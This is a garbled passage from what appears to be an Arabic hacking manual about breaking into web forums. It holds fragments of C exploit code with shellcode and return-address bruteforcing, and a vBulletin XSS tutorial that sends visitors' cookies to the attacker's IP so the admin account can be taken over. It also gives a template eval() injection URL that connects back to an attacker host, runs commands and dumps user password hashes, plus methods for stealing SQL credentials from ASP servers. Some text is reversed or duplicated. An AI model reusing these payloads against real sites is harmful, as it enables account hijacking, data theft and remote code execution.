\\'w .

repretaddr * 4) + victim.(memcpy(p.sin_port = htons(atoi(portp (if(!progress . PADDING_3 .sin_addr.s_addr .(sock = socket(PF_INET.(PUT_BYTES(NOPCOUNT.("\\\HOST_PARAM \\\"\\\\r\\\\n } (++for (i = 0.(()srand(getpid .retaddr += RET_ADDR_INC /* skip invalid return adresses */ ((if(memchr(&victim. NOP .repzero)) + . i < REP_POPULATOR. progress = 0..((printf(\\\"%s\\\\n\\\". SIG_IGN } (for(owned = 0.((sin.retaddr.sin. 0x0a. SOCK_STREAM. 4) || memchr(&victim. shellcode.("\\\-PUT_STRING(\\\"X .("\\\()perror(\\\"connect .s_addr = ia.("\\\ :"\\\)PUT_STRING . i . inet_ntoa(ia .1 . sizeof(sin)) != 0 .(fflush(stdout } (if(connect(sock.victim..("\\\printf(\\\"connected!\\\\n p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * (REP_SHELLCODE PADSIZE_1 + (victim.. sizeof(shellcode) . 4 .return -1 { .sin_family = PF_INET .("\\\ .("\\\PUT_STRING(\\\"\\\\r\\\\n { } (++for (i = 0.retaddr.(signal(SIGPIPE.continue .1 . 0x0d.printf(\\\"[*] Connecting . i 295 . 0 .(PUT_BYTES(PADSIZE_3.(exit(1 { (if(!progress . i < REP_SHELLCODE.((REP_POPULATOR * (1024 + PUT_STRING(\\\"GET / HTTP/1.1\\\\r\\\\nHost: \\\" .sin. (struct sockaddr *) & sin.p += sizeof(shellcode) .

retaddr (++ for(i = 0.("\\\-PUT_STRING(\\\"X . victim.(PUT_BYTES(PADSIZE_2.1.p++ = (victim.retaddr >> 8) & 0xff* .1.(snprintf(buf.expbuf . expbuf. (unsigned int)(p .shown_length = 1 { . j < victim.(PUT_STRING(buf } (if(!shown_length .(PUT_STRING(buf .++progress (if((progress%70) == 0 .responses = 0 } (while (1 .(snprintf(buf..p++ = (victim. PADSIZE_2 .p++ = victim. i < 40.retaddr & 0xff* .int n .struct timeval tv 296 . p .('\\.("\\\ "\\\)printf . \\\"\\\\r\\\\n%x\\\\r\\\\n\\\".(PUT_BYTES(victim.(fflush(stdout .(write(sock.repzero. sizeof(buf) . 0 .("\\\ :"\\\)PUT_STRING } (++for (j = 0.((printf(\\\"[*] Exploit output is %u bytes\\\\n\\\".(printf(\\\"\\\\r[*] Currently using retaddr 0x%lx\\\". PADDING_2 . sizeof(buf) .("\\\PUT_STRING(\\\"Transfer-Encoding: chunked\\\\r\\\\n .progress = 1 } (if(progress == 1 .'\\)putchar { else .delta .repretaddr.('\\putchar(((rand()>>8)%2)? \\'P\\': \\'p .retaddr >> 24) & 0xff* { .p++ = (victim. \\\"\\\\r\\\\n%x\\\\r\\\\n\\\". PADDING_1 .("\\\PUT_STRING(\\\"\\\\r\\\\n { . i . victim.expbuf .retaddr >> 16) & 0xff* .(PUT_BYTES(PADSIZE_1. j .("\\\printf(\\\"\\\\n (if(bruteforce .fd_set fds .

&fds . retaddr=0x%lx. victim.++ responses else .(victim. &fds (if((n = read(0. victim. 0.1)) < 0 .repretaddr. delta=%d. victim.delta. buf.retaddr. strlen(cmdz printf(\\\" it\\'s a TURKEY: type=%s. sizeof(buf } (if(select(sock + 1. repzero=%d\\\\n\\\". sizeof(buf) .tv_sec = sc_timeout . repretaddr=%d.1)) < 0 .((write(sock.(FD_ZERO(&fds .(write(sock.(fflush(stdout { else { .(exit(1 . buf. NULL. owned? NULL : &tv) > 0 } ((if(FD_ISSET(sock. &fds (if((n = read(sock.repzero printf(\\\"Experts say this isn\\'t exploitable.tv_usec = 0 .type. buf.(write(1.("\\\ :now . so nothing will happen .. n { { (if(!owned 297 .(write(sock. n { { } ((if(FD_ISSET(0.tv. victim.responses = 0 (if(responses >= 2 } . &fds . &fds. \\\"O\\\". i ('\\if(buf[i] == \\'G .(FD_SET(0. i < n.owned = 1 . NULL. buf.break (if(n >= 1 } (if(!owned } (++ for(i = 0. cmdz.(FD_SET(sock. 1 .tv. sizeof(buf) .((memset(buf. .

("\\\fprintf(stderr.return -1 { { . \\\"Ooops.break { .angels-bytes.(free(expbuf .return 0 } (if(!bruteforce .. hehehe!\\\\n ..return 0 { (( ‫ قبل وضعها لكم هنا‬angels-bytes.com ‫)) قد تم تجريبها وإختبارها من قبل‬ ‫وهذي وصلة تنزيل البرنامج‬ http://www.(close(sock (if(owned .com/?show=tools&action=info&id=19 ،،،‫انتهى‬ 298 .

0 401 Unauthorized‬‬ ‫‪<error("<p align=right><font face=Tahoma size=2 color=Red‬ليس من حقك‬ ‫الدخول إلى هذه الصفحة>‪.php‬الموجود بـمجلد ‪ admin‬بواسطة المفكرة و‬ ‫أضف عليه كود كلمة السر الذي هو ‪/‬‬ ‫>?‪php‬‬ ‫‪.echo $error_message‬‬ ‫".("<font></p/‬‬ ‫{‬ ‫?<‬ ‫مع تغيير كلمتي‬ ‫‪User‬‬ ‫و‬ ‫‪Password‬‬ ‫‪299‬‬ ."PASSWORD = "Password$‬‬ ‫‪} (function error ($error_message‬‬ ‫‪".‬‬ ‫‪-2‬مي لوحة التحكم بكلمة سر أي إفتح ملف ‪ index.‫" حماية المنتديات "‬ ‫>ةةةةة<‬ ‫الكل يعرف لغة ‪ php‬و التي يصمم بها المنتديات و الكل يعرف أيضا أنها مليئة بالثغرات الكبيرة‬ ‫إليك مدير أي منتدى ) ‪ ( vb‬بعض الساسيات التي يتم بها حماية منتداك ‪/‬‬ ‫‪ً-1‬ل و قبل كل شيء المدير العام ضع مديرين إثنين واحد تكتب فيه المشاركات و تعديل المنتدى و كل شيء‬ ‫و الخر للحتياط عندما يسرق المدير العام ‪.‬ ‫‪."LOGIN = "User$‬‬ ‫‪.("header("HTTP/1.(""header("WWW-Authenticate: Basic entrer="Form2txt admin‬‬ ‫‪.exit‬‬ ‫{‬ ‫( && )‪if ( (!isset($PHP_AUTH_USER)) || ! (($PHP_AUTH_USER == $LOGIN‬‬ ‫‪} ( (( "$PHP_AUTH_PW == "$PASSWORD‬‬ ‫‪.

‬ثم يقوم السكربت بتحويل هذه السطور‬ ‫الى رقم‬ ‫الي بي الذي قمنا بكتابته سابقا )مع ملحظة انه يجب ان يكون على جهازي سيرفر مثل ‪ IIS‬او ‪Apache‬‬ ‫او غيرها ( ‪..‫‪-3‬غ قائمة العضاء لماذا ؟؟ مثل لو كان لديك ‪ 3000‬عضو ووضع الزائر الكريم قائمة العضاء و قعد‬ ‫يفحط به أصبح هناك ضغط كبير على المنتدى قد تسألوني لماذا ل نلغي قائمة البحث !! لن البحث في النسخ‬ ‫الجديدة يكون بأكثر من ثلث أحرف و بهذا لن يكون هناك أي ضغط ‪.....‬‬ ‫‪ -4‬تكثر فتح لغة ‪ HTML‬في المنتديات أي إفتحها بمنتدى واحد أو إثنين فقط لوجود الضرورة ‪ .‬‬ ‫وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الوامر في‬ ‫جهاز وقراءة جزء‬ ‫من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى ‪ .0‬‬ ‫>ةةةةة<‬ ‫‪--------‬‬‫مقدمة ‪:‬‬ ‫‪--------‬‬‫الموضوع ‪ :‬اختراق الـ ‪vBulletin‬‬ ‫المتطلبات ‪) WebServer :‬تركيب سيرفر على جهازك الشخصي( ‪ +‬متصفح انترنت )اكسبلورر( ‪. ( HTML‬ثم اكتب اي موضوع والصق بين السطور‬ ‫هذا الكود ‪:‬‬ ‫>‪script>document..‬لكن يشترط ان يسمح المنتدى بأكواد الـ ‪.‬‬ ‫‪---------‬‬‫الثغرة ‪:‬‬ ‫‪--------‬‬‫تنقسم طريقة العمل الى عدة اقسام ‪ .cookie+'">'.‬‬ ‫المستوى ‪ :‬متوسط‬ ‫ملحظة ‪ :‬هذه الطريقة لست للـ ‪ vBulletin‬فقط !! يمكن ان تجربها على انواع اخرى من المنتديات ‪.‬‬ ‫‪-5‬توقيع و ما أدراك ما التوقيع ‪ .‬لماذا ؟؟‬ ‫لنه يوجد كود هتمل يفسد جميع المواضيع التي تعتمد على هذه اللغة ‪.‬أول بعض السكربتات الخبيثة التي تسرق الكوكيز بالضافة الى جعل‬ ‫المنتدى يستقبل‬ ‫بيانات من مكان خاطيء ‪ . HTML‬‬ ‫قم بكتابة موضوع جديد او رد )في منتدى يدعم الـ ‪ .write('<img‬‬ ‫‪<src="http://my_ip_address/'+document.</script‬‬ ‫مع ملحظة تغير الـ ‪ IP Adress‬الى رقم الـ ‪ IP‬الخاص بك ‪.‬‬ ‫‪300‬‬ .2.‬‬ ‫انتهى‪،،،‬‬ ‫" اختراق المنتديات من نوع ‪" vBulletin2.‬إجعله فقط يخدم الصور أما الفلش و الصوت فل ‪.

‬‬ ‫‪-----------‬‬‫الحل‬ ‫‪----------‬‬‫للحماية من هذه الثغرة قم باغلق الـ ‪ HTML‬في )المنتدى ‪ +‬الرسائل الخاصة ‪ +‬التواقيع ‪ +‬التقويم‬ ‫‪( .com/vb/index..‬لذا كن حذرا واغلق هذه المنافذ ‪....‬ثم اذهب الى اداة ‪ ..‬بهذا الشكل‬ ‫?‪http://www..‬مثال ‪:‬‬ ‫‪GET/ bbuserid=86.2.1 ....php‬‬ ‫‪[bbuserid=[userid]&bbpassword=[password hash‬‬ ‫ستجد عبارة ‪ " :‬أهل بعودتك يـا ) اسم الذي سرقت منه الكوكيز‪" (.‬‬ ‫مثال لو كان السيرفر اباتشي ‪ ..‫وبعد ان تتم العملية بنجاح قم بفتح ملف الـ ‪ Log‬الخاص بالسيرفر الذي يحتويه جهازك ‪.‬‬ ‫اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء ‪! . Acces Log‬‬ ‫ستجد جميع الوامر التي طلبتها من السيرفر ‪ ...‬اذن مالحل ؟‬ ‫قم بنسخ الكود الذي وجدته والصقه في المتصفح ‪ .‬فتاح المجلد ‪ Apche‬واختر ‪ logs‬واختر ‪. Forgot Password‬وعندها تستطيع استقبال بريد‬ ‫يحتوي باسورد الدمن ‪..‬‬ ‫انتهى‪،،،‬‬ ‫‪301‬‬ ..‬اين الباسورد ؟؟‬ ‫الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها ‪ .‬إلخ‬ ‫ابحث عن الكود الخاص بالباسورد ‪ .‬‬ ‫لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم ‪ .‬‬ ‫‪.‬‬ ‫في هذه الحالة انت الن تستطيع التحكم بكل شي وكانك مدير المنتدى )الذي سرقت منه الكوكيز( ‪.0‬وهي تعمل بنجاح ‪.31 :‬‬ ‫تم تجربتها على الصدار ‪ 2...%20bbthreadview[54‬‬ ‫‪%20bblastvi.. Dont' be Lamer‬‬ ‫تاريخ اكتشاف الثغرة ‪2002 . Be Secret . +‬‬ ‫)واي منفذ يمكن من خلله وضع كود ‪ HTML‬باي صورة كانت (‬ ‫كما يجب اغل كود الـ ‪ .victim...1012444064=[20‬‬ ‫‪sit=1011983161‬‬ ‫فكر قليل الن ‪ ..%20sessionhash=a‬‬ ‫‪4719cd620534914930b86839c4bb5f8..‬اذهب الى )التحكم( وقم بتعديل البريد اللكتروني الى‬ ‫بريدك الخاص‬ ‫وثم قم بتسجيل الخروج ‪ . IMG‬لنه ببساطة بامكانك استخدامه بدل كلمة >‪ <script‬فاذا وضعت >‪<img‬‬ ‫او >‪ <Demon‬او‬ ‫اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ‪ .%20bbpassword=dd6169d68822a116cd97e1fb‬‬ ‫‪ddf90622..

cookie)</script‬‬ ‫‪302‬‬ .php‬‬ ‫‪<topic=<script>alert(document.vbulletin.‫"درس مفصل عن كيفية اختراق المنتديات وطرق حمايتها"‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪ :‬ةةةةةة ةةةةةة<‬ ‫الدرس يتكون من ‪ 7‬نقاط‬ ‫‪ 1‬المنتديات وانواعه‬ ‫‪2‬طريقة اختراقه‬ ‫‪ 3‬أختراق الــــ ‪SQL‬‬ ‫‪4‬سرفرات الويندوز ودوره في اختراق المنتديات‬ ‫‪ 5‬النسخه المنتشره في النت ودور المعربين العرب وحقيقة الموضوع وتعريبهم‬ ‫‪6‬الحمايه من المخترقين بنسبة ‪ %80‬لاجهزتكم ومنتدياتكم‬ ‫‪ 7‬المجله بجميع نسخه قابل لالختراق‬ ‫الدروس جميعها بالصورة وحقائق ودلئل‬ ‫قمت بتجميع الدروس والضافتة عليه وتعديله ‪%100‬‬ ‫ارجو عدم نقل الدروس وكوبي‬ ‫****************‬ ‫‪ 1‬المنتديات وانواعه‬ ‫المنتديات اول منتديات جون ‪ Powered by: vBulletin‬بجميع اصداراته‬ ‫‪ 1‬لماذا لم يخترق احدي منتداهم حتي الن‬ ‫‪2‬اليوجد لهم مليون عدو‬ ‫‪ 3‬اليخترقون عشرات المنتديات يوميا ولماذا ليس منتدي جون وحمايته تصل الي ‪ %60‬في السرفر‬ ‫تفضل هذا ثغرات بموقعهم اشوي شغل كمان تصل لقلبهم لاريد التطويل الن بس مثال لمن يفهمه‬ ‫?‪http://www.org/index.

With an URL crafted in a certain way.system written in PHP.com/) is a commonly used web forum ./....org/index./. start an interactive shell and try to elevate their privilege.5 and 2.. Unfortunately this is where vBulletin fails.. This could be somewhat safe as long as the parameters to eval() are under strict control. The bug does not involve buffer overrun or other platform-dependant issues..and inject arbitrary PHP code to be executed A remote user may thus execute any PHP code and programs as the web server user.0 beta 2./etc/passwd ******************** ‫طريقة اختراقه‬ ‫جميع الصدارات‬ ‫ بتذكرو يمكن بعضكم‬113 ‫فلنبدي من صفر نسخة‬ ‫ وهذا‬، ‫ وهذا النوع من المنتديات يحب يركبه قليلين الخبره في أغلب الحيان‬، ‫كلنا نعرف منتديات الفي بي‬ ‫المنتدى هو المعروف عندنا العرب بكثره‬ Jouko Pynnonen (‫الول اللي كتبته الفرنسي )على ما أعتقد‬ vBulletin (http://www. The configuration files are accessible for the web server so the user can in any case access the MySQL database .2 http://www.php is used to fetch a template from database.exploitable under any OS or platform DETAILS ======= vBulletin templates are implemented in the following way: the gettemplate() function in global. One of its key features is use of templates which allow the board administrator to dynamically modify the look of .the board vBulletin templates are parsed with the eval() function./. there's this code 303 .php?| =forum/view./.containing the forums and user information According to the authors the vulnerability exist in all versions of vBulletin up to 1./. The code is then passed to eval().php&topic=.. If we take index. so it's presumably .1.php for :an example.vbulletin. a remote user may control the eval() parameters . typically "nobody".vbulletin./.

"\\\"".php? action=faq&templatecache[faq]=hello+world With this URL.$template$ { .("'". you won't get the FAQ page.$escape=1 gets a template from the db or from the local cache // .(template=str_replace("\"". but just a blank page .$DB_site } (""=![if ($templatecache[$templatename . e.(WHERE title='".} ("if ($action=="faq .global $templatecache.[template=$templatecache[$templatename$ } else { gettemp=$DB_site->query_first("SELECT template FROM template$ .(".("\". After fetching them from the database they're stored in the templatecache[] array. Unfortunately the array is never initialized. so .gettemplate("faq { The dovars() function does some variable replacing.site.templatecache[$templatename]=$template$ { } (if ($escape==1 .a user can pass array contents in the URL.<"largefont> with <font size="10> :The gettemplate() function is defined in global. This array is checked for the template before doing the SQL query."with the words "hello world The eval() call above will execute .g (for simplicity not %-escaped) http://www. addslashes($templatename .php } (function gettemplate($templatename.url/index.return $template { For effectiveness the function implements a simple cache for template strings. such as replace .("eval("echo dovars(\"".("echo dovars("hello world 304 .[template=$gettemp[template$ .

%26%24errstr. but details may differ.0.fputs(%24fp.url/member.have an eval() problem with URL redirecting.or%20press%20return %20for %20command%20line" .%24va=fgets(%24fp. %24fp=fsockopen(substr("IP. The commercial versions are vulnerable too.substr("900" .php3? action=simplesearch&query=searchthis&templatecache[standardredirec t]="%29%3B%24fa="<%261".IP".if 305 .12). It doesn't take a rocket scientist to figure out how a remote user could execute arbitrary code from here.3)). After a little experimenting on the Jelsoft's test site I found some of the commercial versions also .0. Quotation marks aren't always escaped as seen in the code above.3)..0.0.("echo dovars("hello"world This would produce a PHP error message due to unbalanced quotes.url/search.0. a remote user may as well pass a value containing quotation marks and other symbols.ypass&url=hello"world :and a similar one in the Lite version http://www. If your vBulletin board produces an error message .php?acti.site..php? acti.d%20downloads%20database..it's definitely vulnerable The above example works with the "Lite" version.fputs(%24fp.IP.if(!%24fp) {}else{%24arr[200].3)).2).with an URL like the one above prefixed with a single quotation mark .set_time_limit(substr("900". in which case index..IP.63)).g http://www.%20.php could end up executing code like .As if this wouldn't be bad enough. so further details about exploitation aren't necessary.s&templatecache[standardredirect]=hello"world ، ‫ تنفذ في السيرفر‬url ‫ من الكلم هذا أنت ممكن ترسل أكواد خلف‬، ‫تعرفون الكلم هذا ول داعي لترجمه‬ : ‫ جرب مثل‬، ‫ الغبيه‬hello+world ‫تضعها بدل الكلمه‬ vb 113 or 115 ‫ ركب في جهازك ملقم ويب أي ملقم تحبه ممكن تركب عليه‬-1 (‫ عندك في جهازك )طريقه فتح البورت تكون على مجازك‬90 ‫ أفتح البورت‬-2 ‫ هذا الى السيرفر‬url ‫ أرسل الـ‬-3 search.site.0. %26%24errno. e.substr("90".su bstr("vhak1. %24va).

substr("128"."%24res‬‬ ‫‪%24arr).substr("select%20‬‬ ‫‪%20from%20user" .fp‬‬ ‫‪uts(%24fp.3)).substr("%24dbusername".mysql_connect(substr("%24servername".%24currenta=mysql_db_qu‬‬ ‫*‪ery(substr("%24dbname".")..fputs(%24fp.IP."%24res[userid]."%24res[password].‫))‪strlen(%24va)>1‬‬ ‫‪{include(substr("admin/config.18)).}die(vhak‬‬ ‫‪"finished_execution).%24str=exec(fgets(%24fp.0.0.IP‬هذه تحط مكانها رقم الي بي حقك ‪ ،‬ثم الحظ بعدها وجود الرقم ‪ 12‬وهذا تغيرها على‬ ‫طول رقم الي بي ‪ ،‬مثل ‪ 127.‬‬ ‫)‪%24arr).0.IP.include(substr("admin/config.‬‬ ‫‪306‬‬ ..0.%24va).2x‬‬ ‫شفرت ولكن كسرتها وقريبا أقول لك عنها‬ ‫تم شرح طريقة الختراق من ‪ 113‬الي ‪11‬‬ ‫طريقة اختراق من ‪ 115‬الي ‪225‬‬ ‫المتطلبات ‪) WebServer :‬تركيب سيرفر على جهازك الشخصي( ‪ +‬متصفح انترنت )اكسبلورر( ‪.while(%24res=mysql_fetch_array‬‬ ‫‪%20(%24curre‬‬ ‫))‪nta‬‬ ‫‪{fputs(%24fp.echo%28‬‬ ‫‪By Kill -9‬‬ ‫لحظ ‪ IP.strlen(%24dbusername)).").0.strlen(%24serve‬‬ ‫‪rname)).16)).fputs(%24fp.0.}}fclose(%24fp).strlen(%24dbname)).0.1‬يكون طوله ‪9‬‬ ‫ممكن أنت تخترع كود ثاني وترسله وتلحظ أنه يتنفذ ‪ ،‬ممكن ترسل كود يسجل لك أدمين ‪ ،‬هذا مثل ما صار‬ ‫في ‪) arabteam2000.17)).%24ir%2B%2B‬‬ ‫‪{fputs(%24fp.0.0.1).for(%24ir=substr("0".substr("%‬‬ ‫‪24dbpassword" .‬‬ ‫‪php3".com‬أصدقائي طبعا( من باب التنبيه ‪ ،‬وكمان صار في ‪ c4arab.%24ir< sizeof(%24arr)."%24res[usergroupid].strlen(%24dbpassword))).").‬وكثير من المنتديات ‪ ،‬بهدف التحذير وليس التخريب ‪ ،‬وواضح أنه عمل بسيط‬ ‫يحتاج لشويه من التفكير ‪ ،‬أعتقد أهليز زمان صار فيه ‪ ،‬ولكن مسحت الداتالبيس وهذا سهل للغايه‬ ‫طريقه قديمه نوعا ما ‪ ،‬وحطيتها للي حب يجرب فقط !!‬ ‫وأعذروني على الملء والنحو‬ ‫ملحظه أخيره ‪ :‬وهي عند ما تشبك مع السيرفر عن طريق البورت ‪ 90‬أرسل‬ ‫‪d downloads‬‬‫تنزل لك الداتبيس كلها ‪ ،‬وللسف طلعت غير مشفره وهذا يدل على التخلف ‪ ،‬ولكن في الصداره ‪2.fputs(%24fp.%24arr[%24‬‬ ‫‪_ir]).com‬و‬ ‫طريق السلم و الثقافه ‪.0.0.php".

‬لكن يشترط ان يسمح المنتدى بأكواد الـ ‪.‬‬ ‫‪---------‬‬‫الثغرة ‪:‬‬ ‫‪--------‬‬‫تنقسم طريقة العمل الى عدة اقسام ‪ ..‬اذن مالحل ؟‬ ‫قم بنسخ الكود الذي وجدته والصقه في المتصفح ‪ .‬بهذا الشكل‬ ‫?‪http://www...com/vb/index..</script‬‬ ‫مع ملحظة تغير الـ ‪ IP Adress‬الى رقم الـ ‪ IP‬الخاص بك ‪.‬مثال ‪:‬‬ ‫‪GET/ bbuserid=86. Acces Log‬‬ ‫ستجد جميع الوامر التي طلبتها من السيرفر ‪ ...‬‬ ‫وبعد ان تتم العملية بنجاح قم بفتح ملف الـ ‪ Log‬الخاص بالسيرفر الذي يحتويه جهازك ‪. HTML‬‬ ‫قم بكتابة موضوع جديد او رد )في منتدى يدعم الـ ‪ .‫المستوى ‪ :‬متوسط‬ ‫ملحظة ‪ :‬هذه الطريقة لست للـ ‪ vBulletin‬فقط !! يمكن ان تجربها على انواع اخرى من المنتديات ‪.php‬‬ ‫‪[bbuserid=[userid]&bbpassword=[password hash‬‬ ‫‪307‬‬ .‬ثم يقوم السكربت بتحويل هذه السطور‬ ‫الى رقم‬ ‫الي بي الذي قمنا بكتابته سابقا )مع ملحظة انه يجب ان يكون على جهازي سيرفر مثل ‪ IIS‬او ‪Apache‬‬ ‫او غيرها ( ‪.cookie+'">'.‬أول بعض السكربتات الخبيثة التي تسرق الكوكيز بالضافة الى جعل‬ ‫المنتدى يستقبل‬ ‫بيانات من مكان خاطيء ‪ .victim. ( HTML‬ثم اكتب اي موضوع والصق بين السطور‬ ‫هذا الكود ‪:‬‬ ‫>‪script>document...‬‬ ‫مثال لو كان السيرفر اباتشي ‪ ..‬اين الباسورد ؟؟‬ ‫الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها ‪ ..%20bbpassword=dd6169d68822a116cd97e1fb‬‬ ‫‪ddf90622.‬فتاح المجلد ‪ Apche‬واختر ‪ logs‬واختر ‪..1012444064=[20‬‬ ‫‪sit=1011983161‬‬ ‫فكر قليل الن ‪ .‬إلخ‬ ‫ابحث عن الكود الخاص بالباسورد ‪ .%20sessionhash=a‬‬ ‫‪4719cd620534914930b86839c4bb5f8.write('<img‬‬ ‫‪<src="http://my_ip_address/'+document..%20bbthreadview[54‬‬ ‫‪%20bblastvi.‬‬ ‫وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الوامر في‬ ‫جهاز وقراءة جزء‬ ‫من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى ‪ .

.‬‬ ‫لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم ‪ ..‬ثم اذهب الى اداة ‪ .‬اذهب الى )التحكم( وقم بتعديل البريد اللكتروني الى‬ ‫بريدك الخاص‬ ‫وثم قم بتسجيل الخروج ‪ .‫ستجد عبارة ‪ " :‬أهل بعودتك يـا ) اسم الذي سرقت منه الكوكيز‪" (....‬‬ ‫في هذه الحالة انت الن تستطيع التحكم بكل شي وكانك مدير المنتدى )الذي سرقت منه الكوكيز( ‪.‬‬ ‫س ‪ :‬مالذي يمكن ان استفيد منه اذا اخترقت قاعدة بيانات ‪ SQL‬؟‬ ‫هذا على حسب نشاط الموقع اذا كان هذا الموقع منتدى ل اقصد منتديات ‪ PHP‬بل منتديات ‪ ASP‬في الغالب‬ ‫سوف تحصل على جميع اسماء‬ ‫المستخدمين وكلمات السر وبامكانك تعديل وحذف اي موضوع وصلحيات لم تكن تحلم بها ‪ ،‬اما اذا كان‬ ‫الموقع يحتوي على ميزة‬ ‫قائمة المراسلت فسوف تحصل على اعداد خيالية من اليميلت ‪ ،‬عندها قم بانشاء شركة للدعاية والعلن‬ ‫وسوف تصبح ثريا اذن لتنسى ‪_LinuxRay‬‬ ‫توقع ان تجد اي شئ داخل قواعد بيانات معلومات اشخاص ‪ -‬ارقام هواتف ‪ -‬عناوين ‪ -‬تورايخ الميلد ‪،‬‬ ‫ممكن ان تصبح ‪..‬هناك ثغرات كثير يمكن‬ ‫ان تحصل منها على كلمات المرور مثل ثغرة ‪htr. Administrator‬‬ ‫اعرف انه قد اصابك الملل الن لكن استعد نشاطك من جديد فالطريق مازال طويل ‪. Forgot Password‬وعندها تستطيع استقبال بريد‬ ‫يحتوي باسورد الدمن ‪..‬‬ ‫*******************‬ ‫‪ 3‬أختراق الــــ ‪SQL‬‬ ‫يمكنك استخدام برنامج العقرب بيكون اسرع لمن لديه نسخ منه‬ ‫س ‪:‬في البداية ماهي الس كيو ال ) ‪( SQL‬؟؟‬ ‫الس كيو ال هي عبارة عن قاعد بيانات تحتوي على جداول واغلب المواقع التي تكون صفحاتها منتهية ب‬ ‫‪ ASP‬هي صفحات تسحب بياناتها‬ ‫من قاعدة ‪ SQL‬وصفحات ‪ ASP‬ممكن ان تكون كنز من المعلومات لختراق قواعد بيانات ‪ SQL‬وهذا‬ ‫ماسوف اشير اليه لحقا ‪ ،‬و ‪SQL‬‬ ‫تتنصت على البورت ‪1433‬‬ ‫ايضا مااريد ان اخبرك به ان ال ‪ SQL‬قد تحتوي على اكثر من قاعدة بيانات وكل قاعدة بيانات تحتوي على‬ ‫عدد من الجداول يمكن‬ ‫ان تتصور كبرقواعد بيانات ‪ SQL‬والعدد الكبير من البيانات التى تحتويها ‪...‬‬ ‫س ‪ :‬مالذي تحتاجة للدخول على قواعد بيانات ‪ SQL‬؟‬ ‫تحتاج فقط لل ‪ User Name‬و ‪Passwd‬‬ ‫س ‪ :‬من اين احصل على اسم المستخدم وكلمة المرور ؟‬ ‫هناك طرق عديدة للحصول على ‪ User name and Passwd‬منها كما اسلف صفحات ال ‪ASP‬‬ ‫وملفات اخرى من نوع *‪ sql..+‬‬ ‫كيف تستخدم هذه الثغرة ‪:‬‬ ‫‪308‬‬ .

htr‬‬ ‫‪ : target‬الموقع الهدف‬ ‫‪ : Page‬صفحة ‪asp‬‬ ‫‪ : htr.‬هذا ملف يحتوي على اوامر يتم تنفيذها من جانب الملقم ويحتوي على اسم‬ ‫المستخدم وكلمة المرور‬ ‫اذن ماذا تنتظر قم بسحب هذا الملف وذلك باضافة اسم الملف في عنوان الموقع ‪.CreateObject("ADODB..asp+.inc‬‬ ‫>!‪<--"include file = "database.+‬الثغرة‬ ‫هذه الثغرة تقوم احيانا بفتح صفحة بيضاء لتحتوي على اي حرف ‪ ..‬اعرف انك سوف تتساءل مالفائدة‬ ‫اذن منها الفائدة هو‬ ‫خلف هذه الصفحة البيضاء اذهب الى ‪ View Source‬لكي ترى اوامر البرمجة الخاصة ب ‪ ASP‬التى‬ ‫ليمكن لك ان تراها في الوضع العادي ‪ :‬مثل‬ ‫>‪%‬‬ ‫‪("Set DB= Server.APP=Microsoft (R) Developer‬‬ ‫‪"Studio.inc#--‬‬ ‫وهناك عدة ملفات تحتوي على كلمة المرور مثل ملفات‬ ‫‪global.SERVER=xxx.inc.PWD=.Open "DRIVER=SQL‬‬ ‫‪Server.DATABASE=moe_dbs"..WSID=xxx.Connection‬‬ ‫‪DB. line 5/‬‬ ‫هناك ملف ينتهي بامتداد *‪ inc.asa‬‬ ‫‪309‬‬ .UID=sa.‬‬ ‫وممكن ان ترى مثل هذا المر في صفحة ‪ASP‬‬ ‫عند تطبيق الثغرة عليها هذا يعني ان اوامر البرمجة داخل ملف ‪database.‫‪http://target/page. "_LinuxRay". "6666666‬‬ ‫‪<%‬‬ ‫‪-----------------------------------------------------------------‬‬‫في الكود السابق ترى ان اسم المستخدم هو _‪LinuxRay‬‬ ‫وكلمة السر هي ‪6666666‬‬ ‫‪------------------------------------------------------------------‬‬ ‫الشئ المضحك انه احيانا اذا كان هناك خطأ في صفحة ال ‪ ASP‬مثل التي ‪:‬‬ ‫‪'AMicrosoft VBScript runtime error '800a01a8‬‬ ‫‪'Object required: 'Conn‬‬ ‫‪filename.

2‬اسم المستخدم في ‪User Name‬‬ ‫‪ .‬‬ ‫سيظهر لك مربع لنشاء الملف اختر‬ ‫‪Create‬‬ ‫اي انشاء‬ ‫الن سترى مربع‬ ‫‪Data Link Properties‬‬ ‫تحتاج فقط لثلث معلومات اسم الموقع او الي بي ‪ -‬اسم المستخدم ‪ -‬كلمة المرور‬ ‫‪ .sql‬‬ ‫‪global-direct.asa+.‬ماذا بعد الحصول على اسم المستخدم وكلمة المرور ؟؟‬ ‫بعدها الدخول على قاعدة ال ‪!! SQL‬‬ ‫هناك عدة برامج تدخل على قاعدة البينات انا استخدم ‪ Visual interdev 6.3‬كلمة السر ‪Password‬‬ ‫ملحظة ) قم بإزالة الصح من مربع ‪(Blank Password‬‬ ‫‪310‬‬ .asa‬‬ ‫ليس من الضرورة ان تكون الملفات بهذه السماء لكن هذا هو المعتاد عليه من قبل مبرمجين ‪SQL‬‬ ‫وكل ماعليك فعله ان تكتب اسم الصفحة مثل التي ‪:‬‬ ‫‪global.htr‬‬ ‫هناك ثغرة قديمة في ‪ IIS 3‬وهي ان تضيف بعد صفحة ‪ ASP‬هذا الرمز ‪ data$::‬كما يلي‬ ‫‪file.asa‬‬ ‫‪global.‫‪global.asa++‬‬ ‫‪beforemilion-global.0‬لكني مازلت افضل‬ ‫استخدام البرنامج السهل ‪ACCESS 2000‬‬ ‫كل ما عليك فعله هو فتح البرنامح الذهاب الى قائمة‬ ‫‪File‬‬ ‫اختر‬ ‫‪New‬‬ ‫ومن قائمة الملفات الجديدة اختار‬ ‫‪(Project (Exiting Data‬‬ ‫اي مشروع قاعدة بيانات موجودة ‪.asp::$data‬‬ ‫هذه الثغرة لتعمل ال على ‪ IIS 3‬فل 